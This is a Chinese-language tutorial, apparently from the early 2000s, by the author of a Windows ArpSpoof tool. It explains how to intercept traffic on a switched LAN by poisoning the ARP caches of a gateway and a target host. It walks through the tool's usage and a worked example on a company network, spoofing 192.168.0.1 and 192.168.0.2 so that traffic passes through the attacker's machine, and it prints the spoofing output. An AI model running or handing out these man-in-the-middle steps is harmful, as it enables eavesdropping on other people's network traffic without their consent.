根据交换环境中Sniffer实现的原理(详见交换环境下Sniffer的实现)，我写了一个类似于Linux环境下的ArpSpoof实现在Windows环境下的Arp Sniffer。

　　在交换环境下Windows中实现Sniffer需要具备的条件:

　　1、安装Winpcap驱动。

　　2、我写了一个类似于Linux环境下的ArpSpoof(我只在Windows 2000 Server下测试过，其他期待您的测试)。

　　3、一个Sniffer，如NetXray或者NAI Sniffer Pro(推荐)。

　　具体的实现方法：

　　使用ArpSpoof实现基于ARP的欺骗：

　　C:\>arpspoof.exe

　　ARPSpoof, by netXeyes, Special Thanks BB

　　www.netXeyes.com 2002, dansnow@21cn.com

　　Usage: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]

　　其中Spoof IP1和Spoof IP2是想要进行欺骗和嗅探的IP地址，Own IP是自己的IP地址(注意这三个IP必须是在同一个局域网内没有跨越交换机或者路由器)。

　　例如目前公司的局域网环境为192.168.0.xxx，子网掩码为255.255.255.0，网关为192.168.0.1。我们的IP为192.168.0.29，想要Sniffer 192.168.0.2的数据包。

　　由于网关为192.168.0.1，所以我们就只要欺骗192.168.0.1和192.168.0.2就可以了。也就是说告诉192.168.0.1，192.168.0.2的MAC地址是自己(192.168.0.29);然后再告诉192.168.0.2, 192.168.0.1的MAC地址是自己(192.168.0.29)。这样以来所有的数据包都会发到192.168.0.29，并且由192.168.0.29实现转发(windows 2000默认可以进行包转发，至于Windows 9.x和Windows NT/XP我没有测试过，希望您可以告诉我)。

　　C:\>arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29

　　ARPSpoof, by netXeyes, Special Thanks BB

　　www.netXeyes.com 2002, dansnow@21cn.com

　　Begin Spoof.........

　　Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29

　　Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29